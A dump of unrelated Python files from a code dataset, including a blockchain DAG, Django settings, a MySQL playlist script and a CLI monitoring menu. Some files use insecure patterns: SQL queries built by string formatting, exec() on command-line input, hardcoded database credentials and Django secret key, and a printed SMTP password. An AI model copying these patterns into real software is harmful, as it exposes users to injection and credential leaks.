'build_ext': CopyExt,
'clean': CustomClean,
},
ext_modules=ext_modules,
packages=packages,
package_dir={'': get_package_dir(PY_INSTALL_CFG)},
package_data=package_data,
zip_safe=False,
)
|
py | b415d14cc4bdf45cf5ed3b1a8d1742e819da255d | #!/usr/local/bin/python
# encoding: utf-8
"""
*Get the file creation and modification dates*
:Author:
David Young
:Date Created:
December 10, 2013
.. todo::
@review: when complete pull all general functions and classes into dryxPython
Usage:
get_file_creation_modification_dates --pathToFile=<pathToFile>
-h, --help show this help message
-v, --version show version
"""
################# GLOBAL IMPORTS ####################
import sys
import os
from docopt import docopt
from dryxPython import logs as dl
import __init__ as dcu
def main(arguments=None):
"""
*The main function used when ``get_file_creation_modification_dates.py`` is run as a single script from the cl, or when installed as a cl command*
"""
########## IMPORTS ##########
## STANDARD LIB ##
## THIRD PARTY ##
## LOCAL APPLICATION ##
## ACTIONS BASED ON WHICH ARGUMENTS ARE RECIEVED ##
# PRINT COMMAND-LINE USAGE IF NO ARGUMENTS PASSED
if arguments == None:
arguments = docopt(__doc__)
# SETUP LOGGER -- DEFAULT TO CONSOLE LOGGER IF NONE PROVIDED IN SETTINGS
if 'settings' in locals() and "logging settings" in settings:
log = dl.setup_dryx_logging(
yaml_file=arguments["--settingsFile"]
)
elif "--logger" not in arguments or arguments["--logger"] is None:
log = dl.console_logger(
level="WARNING"
)
log.debug('logger setup')
# unpack remaining cl arguments using `exec` to setup the variable names
# automatically
for arg, val in arguments.iteritems():
varname = arg.replace("--", "")
if isinstance(val, str) or isinstance(val, unicode):
exec(varname + " = '%s'" % (val,))
else:
exec(varname + " = %s" % (val,))
if arg == "--dbConn":
dbConn = val
log.debug('%s = %s' % (varname, val,))
## START LOGGING ##
startTime = dcu.get_now_sql_datetime()
log.info(
'--- STARTING TO RUN THE get_file_creation_modification_dates.py AT %s' %
(startTime,))
# call the worker function
# x-if-settings-or-database-credientials
dateCreated, dateModified = get_file_creation_modification_dates(
log=log,
pathToFile=pathToFile,
)
print "Created: %s, Modified: %s" % (dateCreated, dateModified)
if "dbConn" in locals() and dbConn:
dbConn.commit()
dbConn.close()
## FINISH LOGGING ##
endTime = dcu.get_now_sql_datetime()
runningTime = dcu.calculate_time_difference(startTime, endTime)
log.info(
'-- FINISHED ATTEMPT TO RUN THE get_file_creation_modification_dates.py AT %s (RUNTIME: %s) --' %
(endTime, runningTime, ))
return
###################################################################
# CLASSES #
###################################################################
###################################################################
# PUBLIC FUNCTIONS #
###################################################################
# LAST MODIFIED : December 10, 2013
# CREATED : December 10, 2013
# AUTHOR : DRYX
def get_file_creation_modification_dates(
log,
pathToFile,
):
"""
*get_file_creation_modification_dates*
**Key Arguments:**
- ``log`` -- the logger
- ``pathToFile`` -- pathToFile
**Return:**
- ``dateCreated`` and ``dateModified`` -- the date the file was created and last modified
.. todo::
@review: when complete, clean worker function and add comments
@review: when complete add logging
"""
################ > IMPORTS ################
## STANDARD LIB ##
import os
import datetime
from time import strftime
## THIRD PARTY ##
## LOCAL APPLICATION ##
dateCreated = os.path.getctime(pathToFile)
dateCreated = datetime.datetime.fromtimestamp(dateCreated)
dateModified = os.path.getmtime(pathToFile)
dateModified = datetime.datetime.fromtimestamp(dateModified)
return dateCreated, dateModified
# use the tab-trigger below for new function
# x-def-with-logger
###################################################################
# PRIVATE (HELPER) FUNCTIONS #
###################################################################
############################################
# CODE TO BE DEPECIATED #
############################################
if __name__ == '__main__':
main()
###################################################################
# TEMPLATE FUNCTIONS #
###################################################################
|
py | b415d17786098c013d11d9ce2e1e0304774e8779 | import hashlib
import crypto
from collections import namedtuple
MIN_WORK = '000'
# directed acyclic graph primitives
# OpenTx
# params:
# account => which blockchain account you trying to open
# hash => hash of the opentx
# work => work done to get the 'valid' txid (starts with X amount of zeros)
OpenTx = namedtuple("OpenTx", "account hash work")
# SendTx
# params:
# prev => previous hash
# hash => hash of the sendtx
# rpk => random pk (for stealth address)
# signature => signature to verify that the sender authorized it
# msg => msg type
# work => work done to get the 'valid' hash (starts with X amount of zeros)
SendTx = namedtuple("SendTx", "prev hash rpk destination signature msg work")
# ReceiveTx
# params:
# prev => previous hash
# hash => hash of the receive tx
# source => source of the receiveTx (hash of the sendtx)
# work => work done to get the 'valid' hash (starts with X amount of zeros)
ReceiveTx = namedtuple("ReceiveTx", "prev hash source work")
# DAG
class DAG:
def __init__(self, usedtxids={}, cachehash={}, cachedmessages={}, accounts={}):
"""
params:
usedtxids => {}
cachehash => {}
cachedmessages => {}
accounts => {}
usedtxids is a dictionary containing used send txids
cachehash is a dictionary where key: hash value: tx
cachedmessages is a dictionary where key: hash, value: message
accounts is a dictionary where each key is an address e.g.
accounts = {
'abcdefgh': {
'latest': 5,
1: tx(),
2: tx(),
3: tx()
}
}
"""
self.usedtxids = usedtxids
self.accounts = accounts
self.cachehash = cachehash
self.cachedmessages = cachedmessages
def insert_tx(self, pk, tx):
t = type(tx)
if t == OpenTx:
self._insert_open(pk, tx)
elif t == SendTx:
self._insert_send(pk, tx)
elif t == ReceiveTx:
self._insert_receive(pk, tx)
self.cachehash[tx.hash] = tx
def _insert_open(self, pk, tx):
if not valid_work(tx):
return
# Don't overwrite existing account
if self.accounts.get(pk, None) is not None:
return
self.accounts[pk] = {
'latest': 0,
0: tx
}
def _insert_send(self, pk, tx):
if not (valid_signature(pk, tx) and valid_work(tx)):
return
if not (self.get_latest(pk).hash == tx.prev):
return
new_latest = self.accounts[pk]['latest'] + 1
self.accounts[pk]['latest'] = new_latest
self.accounts[pk][new_latest] = tx
def _insert_receive(self, pk, tx):
if not valid_work(tx):
return
if not (self.get_latest(pk).hash == tx.prev):
return
new_latest = self.accounts[pk]['latest'] + 1
self.accounts[pk]['latest'] = new_latest
self.accounts[pk][new_latest] = tx
def get_message(self, h):
return self.cachedmessages.get(h, None)
def get_messages(self):
return self.cachedmessages
def add_message(self, h, decrypted_msg):
self.cachedmessages[h] = decrypted_msg
def get_latest(self, pk):
pk_dict = self.accounts.get(pk, {})
if pk_dict == {}:
return None
latest_no = pk_dict['latest']
return pk_dict[latest_no]
def get_account(self, pk):
return self.accounts.get(pk, {})
def get_hash(self, h):
if self.hash_received(h):
return self.cachehash[h]
return None
def hash_received(self, h):
return h in self.cachehash
# Hashes an opentx
def hash_opentx(opentx):
bytestr = str.encode("account:{},work:{}".format(
opentx.account, opentx.work))
h = hashlib.sha256(bytestr).hexdigest()
return h
# Hashes a send tx
def hash_sendtx(sendtx):
bytestr = str.encode(
"prev:{},destination:{},rpk:{},signature:{},msg:{},work:{}".format(
sendtx.prev, sendtx.destination, sendtx.rpk, sendtx.signature, sendtx.msg, sendtx.work
)
)
h = hashlib.sha256(bytestr).hexdigest()
return h
# Hashes a receive tx
def hash_receivetx(receivetx):
bytestr = str.encode(
"prev:{},source:{},work:{}".format(
receivetx.prev, receivetx.source, receivetx.work
)
)
h = hashlib.sha256(bytestr).hexdigest()
return h
# Hashes tx
def hash_tx(tx):
t = type(tx)
if t != OpenTx and t != SendTx and t != ReceiveTx:
return -1
if t == OpenTx:
h = hash_opentx(tx)
elif t == SendTx:
h = hash_sendtx(tx)
elif t == ReceiveTx:
h = hash_receivetx(tx)
return h
def prep_signature(sendtx):
s = "prev:{},destination:{},rpk:{},msg:{}".format(
sendtx.prev, sendtx.destination, sendtx.rpk, sendtx.msg)
return s
def sign_sendtx(sk, sendtx):
sk = crypto.decodeint(sk[:64].decode('hex'))
msg = prep_signature(sendtx)
pk = crypto.publickey(sk)
sig = crypto.signature(msg, sk, pk)
# Reconstruct named tuple
tx_dict = sendtx._asdict()
tx_dict['signature'] = sig.encode('hex')
return SendTx(**tx_dict)
def valid_work(tx):
# Tx hash
h = hash_tx(tx)
return h[:len(MIN_WORK)] == MIN_WORK
def valid_signature(pk, sendtx):
sig = sendtx.signature.decode('hex')
msg = prep_signature(sendtx)
return crypto.checkvalid(sig, msg, pk[:64].decode('hex'))
def mine_tx(tx):
# Tx hash
h = hash_tx(tx)
# Tx type
t = type(tx)
if h == -1:
return -1
# Valid work done
# Python and recursion doesn't work well
# So i'll have to use a while loop
while not valid_work(tx):
d = tx._asdict()
d['work'] = tx.work + 1
tx = t(**d)
h = hash_tx(tx)
d = tx._asdict()
d['hash'] = h
return t(**d)
|
py | b415d271ad31349eac7ac14ee52ea8b543b58df2 | import json
import cs_vqe_classes.cs_vqe_circuit as cs_circ
import utils.qonversion_tools as qonvert
from qeqiskit.conversions import import_from_qiskit
from zquantum.core.circuits import save_circuit
from zquantum.core.openfermion import save_qubit_operator
from zquantum.core import circuits, serialization
def ansatz_circuit(ham, terms_noncon, anz_op, num_qubits, num_sim_q):
with open(terms_noncon, 'r') as json_file:
terms_noncon = (json.load(json_file))['list']
mol_circ = cs_circ.cs_vqe_circuit(hamiltonian=ham,
terms_noncon=terms_noncon,
num_qubits=num_qubits)
# output reduced Hamiltonian
ham_red = (mol_circ.ham_reduced)[num_sim_q]
ham_red_q = qonvert.dict_to_QubitOperator(ham_red)
save_qubit_operator(ham_red_q, "ham_red.json")
# output Ansatz circuit
anz_circ = mol_circ.build_circuit(anz_op, num_sim_q)
anz_circ_zq = import_from_qiskit(anz_circ)
save_circuit(anz_circ_zq, "ansatz_circuit.json")
# output the initial parameter values
init_params = mol_circ.init_params(anz_op, num_sim_q)
serialization.save_array(init_params, "init_params.json") |
py | b415d304f522c6ed96879beea7b03d55d7f19a32 | """
WSGI config for HealthAndSafety project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HealthAndSafety.settings')
application = get_wsgi_application()
|
py | b415d4358dbd636213bae94634c18dddaf4598d0 | """
Django settings for cowrywise_challenge project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-vd=gz^g#ws@ptd=bmo!afz+%ah&tz#$bukr1et2e(ofsrzmr=&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'timestamp_uuid_generator'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cowrywise_challenge.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cowrywise_challenge.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
py | b415d4e244bbda66b3c817b408957c14e7d37835 | import mysql.connector as db
import random
from pprint import pprint
# DB CONNECTION
connection = db.connect(user='root', password='admin', host='localhost',
database='spotty', auth_plugin='mysql_native_password')
cursor = connection.cursor()
# QUERY
GET_USERS_QUERY = (
"select U.id, D.id "
"from User U inner join DailySuggestion D on U.id=D.suggestedFor;"
)
REMOVE_TRACK = (
"delete from TrackBelongsToPlaylist "
"where playlist='{}'"
)
GET_LIKED_TRACK = (
"select T.id "
"from Track T inner join LikesTrack L on T.id=L.track "
"where L.user='{}' "
"order by date desc "
"limit 5"
)
GET_SIMILAR_TRACK = (
"select track1, track2 "
"from Similarity "
"where track1='{}' or track2='{}' "
"order by amount "
"limit 3"
)
INSERT_TRACK = (
"insert ignore into TrackBelongsToPlaylist (track,playlist,addedDate) "
"values ('{}','{}',now())"
)
GET_MOST_LISTENED_GENRES = (
"select C.category, count(*) as n "
"from ListenedTo L inner join Track T on L.track=T.id inner join TrackBelongsToCategory C on T.id=C.track "
"where user='{}' "
"group by C.category "
"order by n desc "
"limit 2"
)
GET_TRACKS = (
"select C.track "
"from TrackBelongsToCategory C "
"where C.category='{}' "
)
# GETTING ALL USERS
cursor.execute(GET_USERS_QUERY)
users = cursor.fetchall() # every user is a tuple (user_id,playlist_id)
for user in users:
# rimuovo le track dalla playlist per aggiornarla
cursor.execute(REMOVE_TRACK.format(user[1]))
# prendo le ultime 5 track a cui ha messo like
cursor.execute(GET_LIKED_TRACK.format(user[0]))
tracks = cursor.fetchall()
tracks = list(map(lambda x: x[0], tracks)) # da tupla a stringa
track_set = []
for track in tracks:
# per ogni track prendo le 3 più simili
cursor.execute(GET_SIMILAR_TRACK.format(track, track))
similarity = cursor.fetchall()
similarity = list(
map(lambda x: x[0] if x[1] == track else x[1], similarity))
track_set = track_set+similarity
suggested = list(set(track_set)) # creo un set per togliere le ripetizioni
n = 5 if len(suggested) > 5 else len(suggested)
for i in range(n):
t = random.choice(suggested) # ne aggiungo 5 in maniera random
suggested.remove(t)
cursor.execute(INSERT_TRACK.format(t, user[1]))
cursor.execute(GET_MOST_LISTENED_GENRES.format(user[0]))
genres = cursor.fetchall()
genres = list(map(lambda x: x[0], genres))
track_set = []
for genre in genres:
cursor.execute(GET_TRACKS.format(genre))
tracks = cursor.fetchall()
tracks = list(map(lambda x: x[0], tracks))
track_set = track_set + tracks
suggested = list(set(track_set))
n = 15 if len(suggested) > 15 else len(suggested)
for i in range(n):
t = random.choice(suggested) # ne aggiungo 5 in maniera random
suggested.remove(t)
cursor.execute(INSERT_TRACK.format(t, user[1]))
connection.commit()
connection.close()
|
py | b415d602f9fe7631d57fef8f65ef1a44bedc2f08 | from django.utils.text import slugify
import factory
from accounts.tests.factories import UserFactory
from pages.models import Category, Page
class CategoryFactory(factory.django.DjangoModelFactory):
title = factory.Faker('job')
slug = factory.LazyAttribute(lambda a: slugify(a.title))
class Meta:
model = Category
class PageFactory(factory.django.DjangoModelFactory):
title = factory.Faker('job')
url = factory.LazyAttribute(lambda a: '/{slug}/'.format(slug=slugify(a.title)))
category = factory.SubFactory(CategoryFactory)
created_by = factory.SubFactory(UserFactory)
updated_by = factory.LazyAttribute(lambda a: a.created_by)
class Meta:
model = Page
|
py | b415d7da010411c24a821c3cc9196f1bc98b55dc | """Auto-generated file, do not edit by hand. 800 metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_800 = PhoneMetadata(id='001', country_code=800, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='\\d{8}', possible_number_pattern='\\d{8}', example_number='12345678'),
fixed_line=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA', example_number='12345678'),
mobile=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA', example_number='12345678'),
toll_free=PhoneNumberDesc(national_number_pattern='\\d{8}', possible_number_pattern='\\d{8}', example_number='12345678'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
number_format=[NumberFormat(pattern='(\\d{4})(\\d{4})', format=u'\\1 \\2')],
leading_zero_possible=True)
|
py | b415d85486328d5f888f520b5415af8dd55f6df0 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""
source_printer.py
prints Go functions
"""
class FunctionPrinter(object):
def __init__(self, ctx, clazz, leafs=None, children=None):
self.ctx = ctx
self.clazz = clazz
self.leafs = leafs
self.children = children
name = clazz.go_name()
identifier = '%s%s' % (name[0].lower(), name[1:])
if clazz.iskeyword(identifier):
identifier = "self"
self.class_alias = identifier
# This method should be called on any class inheriting FunctionPrinter
# which will print the function header and body defined in such class.
def print_all(self):
self.print_function_header()
self.print_function_body()
self.print_function_trailer()
def print_function_trailer(self):
self.ctx.lvl_dec()
self.ctx.writeln('}')
self.ctx.bline()
# This method is meant to assist in printing a function header by any
# class implementing FunctionPrinter or by the quick_print method.
def print_function_header_helper(self, name, args='', return_type=' '):
if return_type != ' ':
return_type = ' %s ' % return_type
self.ctx.writeln('func (%s *%s) %s(%s)%s{' % (
self.class_alias, self.clazz.qualified_go_name(),
name, args, return_type))
self.ctx.lvl_inc()
# This method is meant to be called to quickly print any getter/setter function
# to forgo defining a new class.
def quick_print(self, name, args='', return_type=' ', stmt='', return_stmt=''):
if return_type != ' ':
return_type = ' %s ' % return_type
if (return_stmt != ''):
stmt = 'return %s' % return_stmt
self.ctx.writeln('func (%s *%s) %s(%s)%s{ %s }' % (
self.class_alias,
self.clazz.qualified_go_name(),
name,
args,
return_type,
stmt))
self.ctx.bline()
|
py | b415d9596b568d6203fb0b2cb59c26785bfd623e | """
Interactive CLI menu module
"""
# Imports
import os # Os module for the 'clear' command.
import sys # Sys module for the 'exit' command.
import config # Config module for the setter functions.
import cron # Cron module for the crontab manipulations.
# Menu decorator
def menu_decorator(menu):
def wrapper():
# Header
os.system("clear")
print "Light System Monitor\n"
# Current menu
menu()
# Footer
print
# If the decorated function is a submenu:
if menu.__name__[:3] == "sub":
print "9. Back"
# Else if the decorated function is the main menu:
elif menu.__name__ == "menu_main":
print "0. Exit"
else:
print "0. Main menu"
choice = raw_input(">> ")
exec_menu(choice, menu.__name__)
return wrapper
# Main menu1
@menu_decorator
def menu_main():
print "Please choose an option:"
print "1. Crontab configuration"
print "2. Alerts configuration"
print "3. Email configuration"
# Execute menu
def exec_menu(choice, current_menu):
# If the 'choice' action exists in the current menu's options,
# use it. Otherwise remain the in the current menu.
# This can be redone to use dict.get() method actually.
try:
menu_actions[current_menu][choice]()
except KeyError:
menu_actions[current_menu][current_menu]()
# Exit program
def app_exit():
os.system("clear")
sys.exit(0)
# Crontab menu
@menu_decorator
def menu_cron():
print "Crontab configuration\n"
if cron.is_set():
print "Crontab is set\n"
print "1. Add to crontab"
print "2. Remove from crontab"
# Add to crontab
def menu_cron_add():
cron.add()
exec_menu("menu_cron", "menu_cron")
# Remove from crontab
def menu_cron_remove():
cron.remove()
exec_menu("menu_cron", "menu_cron")
# Alerts menu
@menu_decorator
def menu_alerts():
print "Alerts configuration\n"
print "1. Processes"
print "2. Thresholds"
# Alerts - Processes sub-menu
@menu_decorator
def submenu_alerts_processes():
print "Alerts configuration -> Processes\n"
print "Watched processes: {}\n".format(", ".join(config.list_processes()))
print "1. Add process"
print "2. Remove process"
# Alerts - Processes - Add
@menu_decorator
def submenu_alerts_processes_add():
print "Alerts configuration -> Processes -> Add Process\n"
process = raw_input("Please enter a process to watch: ")
if config.add_process(process):
print "{} added to the watch list!".format(process)
else:
print "Failed to add!"
raw_input("Press enter to acknowledge.")
# TODO - Maybe there's no need for this output and it's easier to see the results in the parent menu.
exec_menu("submenu_alerts_processes", "submenu_alerts_processes")
# Alerts - Processes - Remove
@menu_decorator
def submenu_alerts_processes_remove():
print "Alerts configuration -> Processes -> Remove Process\n"
process = raw_input("Please enter a process to remove from watching: ")
if config.remove_process(process):
print "{} removed from the watch list!".format(process)
else:
print "Failed to remove!"
raw_input("Press enter to acknowledge.")
# TODO - Maybe there's no need for this output and it's easier to see the results in the parent menu.
exec_menu("submenu_alerts_processes", "submenu_alerts_processes")
# Alerts - Thresholds sub-menu
@menu_decorator
def submenu_alerts_thresholds():
print "Alerts configuration -> Thresholds\n"
print "1. Set CPU percentage threshold"
print "2. Set Memory percentage threshold"
print "3. Set Swap memory percentage threshold"
print "4. Set Core Temperature threshold"
# Alerts - Thresholds sub-menu - Set CPU
@menu_decorator
def submenu_alerts_thresholds_cpu():
print "Alerts configuration -> Thresholds -> CPU percentage\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_cpu_percent(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Alerts - Thresholds sub-menu - Set Memory
@menu_decorator
def submenu_alerts_thresholds_memory():
print "Alerts configuration -> Thresholds -> Memory percentage\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_memory_percent(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Alerts - Thresholds sub-menu - Set Swap
@menu_decorator
def submenu_alerts_thresholds_swap():
print "Alerts configuration -> Thresholds -> Swap percentage\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_swap_percent(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Alerts - Thresholds sub-menu - Core temperature
@menu_decorator
def submenu_alerts_thresholds_temp_core():
print "Alerts configuration -> Thresholds -> Core temperature\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_temp_core(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Email menu
@menu_decorator
def menu_email():
print "Email configuration\n"
print "1. Recipient address"
print "2. SMTP server"
# Email - Recipient sub-menus
@menu_decorator
def submenu_email_recipient():
print "Email configuration -> Recipient address\n"
print "Currently set address: {}\n".format(config.settings["email"]["address"])
print "1. Change address"
# Email - Change the recipient
@menu_decorator
def submenu_email_recipient_change():
print "Email configuration -> Recipient address -> Address change\n"
address = raw_input("Please enter a new address: ")
config.set_email(address)
exec_menu("submenu_email_recipient", "submenu_email_recipient")
# Email - SMTP sub-menus
@menu_decorator
def submenu_email_smtp():
print "Email configuration -> SMTP configuration\n"
print "Currently set server: {}".format(config.settings["email"]["smtp_server"])
print "Currently set username: {}".format(config.settings["email"]["smtp_user"])
print "Currently set password: {}\n".format(config.settings["email"]["smtp_pass"])
print "1. Change address"
print "2. Change username"
print "3. Change password"
# Email - Change the SMTP server
@menu_decorator
def submenu_email_smtp_change():
print "Email configuration -> SMTP configuration -> Server change\n"
server = raw_input("Please enter a new server domain name or IP: ")
config.set_smtp(server)
exec_menu("submenu_email_smtp", "submenu_email_smtp")
# Email - Change the SMTP username
@menu_decorator
def submenu_email_smtp_user():
print "Email configuration -> SMTP configuration -> Username change\n"
username = raw_input("Please enter a new SMTP username: ")
config.set_smtp_user(username)
exec_menu("submenu_email_smtp_user", "submenu_email_smtp_user")
# Email - Change the SMTP password
@menu_decorator
def submenu_email_smtp_pass():
print "Email configuration -> SMTP configuration -> Password change\n"
server = raw_input("Please enter a new SMTP password: ")
config.set_smtp_pass(server)
exec_menu("submenu_email_smtp_pass", "submenu_email_smtp_pass")
# Menu definition
menu_actions = {
"menu_main": {
"menu_main": menu_main,
"1": menu_cron,
"2": menu_alerts,
"3": menu_email,
"0": app_exit,
},
"menu_cron": {
"menu_cron": menu_cron,
"1": menu_cron_add,
"2": menu_cron_remove,
"0": menu_main,
},
"menu_alerts": {
"menu_alerts": menu_alerts,
"1": submenu_alerts_processes,
"2": submenu_alerts_thresholds,
"0": menu_main,
},
"submenu_alerts_processes": {
"submenu_alerts_processes": submenu_alerts_processes,
"1": submenu_alerts_processes_add,
"2": submenu_alerts_processes_remove,
"9": menu_alerts,
"0": menu_main,
},
"submenu_alerts_thresholds": {
"submenu_alerts_thresholds": submenu_alerts_thresholds,
"1": submenu_alerts_thresholds_cpu,
"2": submenu_alerts_thresholds_memory,
"3": submenu_alerts_thresholds_swap,
"4": submenu_alerts_thresholds_temp_core,
"9": menu_alerts,
"0": menu_main,
},
"menu_email": {
"menu_email": menu_email,
"1": submenu_email_recipient,
"2": submenu_email_smtp,
"0": menu_main,
},
"submenu_email_recipient": {
"submenu_email_recipient": submenu_email_recipient,
"1": submenu_email_recipient_change,
"9": menu_email,
"0": menu_main,
},
"submenu_email_smtp": {
"submenu_email_smtp": submenu_email_smtp,
"1": submenu_email_smtp_change,
"2": submenu_email_smtp_user,
"3": submenu_email_smtp_pass,
"9": menu_email,
"0": menu_main,
}
}
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.